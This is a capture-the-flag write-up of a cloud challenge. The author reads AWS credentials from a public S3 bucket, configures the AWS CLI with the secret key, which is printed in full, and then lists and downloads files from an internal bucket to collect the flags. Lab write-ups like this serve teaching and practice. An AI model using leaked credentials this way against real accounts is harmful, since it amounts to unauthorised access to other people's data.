Obtaining external access keys
[25 points] Open the external storage and see if there's something useful in there.
The link to the external storage leads to https://external-spaceship-storage-b38e8c6.s3-eu-west-1.amazonaws.com
, an AWS S3 bucket.
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
There is an item called external-spaceship-storage.txt
. The file can be downloaded by typing the filename in the URL, i.e., https://external-spaceship-storage-b38e8c6.s3-eu-west-1.amazonaws.com/external-spaceship-storage.txt
The contents are as follows:
The last line is the flag for the first sub-challenge, and the rest of the information will be useful for the next sub-challenge.
Flag: CTF{6c2c45330a85b126f551}
Checking your internal storage
[25 points] You have managed to get keys. See if you can get inside and check the internal spaceship storage.
This part took me FOREVER to figure out due to the fact that I had absolutely no clue how AWS S3 buckets work. Looking through some cloud challenges from other CTFs and the AWS docs, I figured that remaining information from external-spaceship-storage.txt
is what helps to complete this challenge.
+BAPTBu9QFX6TVSpjerFoIJiJJr1D+c210ZyKdqv - AWS Secret Access Key
Configure AWS credentials
The AWS Access Key ID and Secret Access Key are credentials for an AWS account. This can be configured in the AWS CLI (Command Line Interface) to view buckets and items within those buckets associated with the account. The steps to install AWS CLI for your system can be found here.
Once installed, we configure AWS CLI with these credentials. Using --profile
helps to distinguish between different credentials.
$ aws configure --profile=locked-out
AWS Secret Access Key [None]: +BAPTBu9QFX6TVSpjerFoIJiJJr1D+c210ZyKdqv
Default region name [None]: eu-west-1
Default output format [None]:
Listing all buckets reveals an internal storage bucket, which contains a keys text file.
$ aws s3 ls --profile=locked-out
2021-06-24 19:36:05 external-spaceship-storage-b38e8c6
2021-06-24 19:35:27 internal-spaceship-storage-fdde98f
$ aws s3 ls internal-spaceship-storage-fdde98f --profile=locked-out
2021-06-24 19:35:33 25 spaceship-keys
Downloading and viewing the file reveals the flag for this sub challenge
$ aws s3 cp s3://internal-spaceship-storage-fdde98f/spaceship-keys . --profile=locked-out
download: s3://internal-spaceshipstoragefdde98f/spaceship-keys to ./spaceship-keys
$ cat spaceship-keys
Flag: CTF{4ababede5580d9a22a2a}
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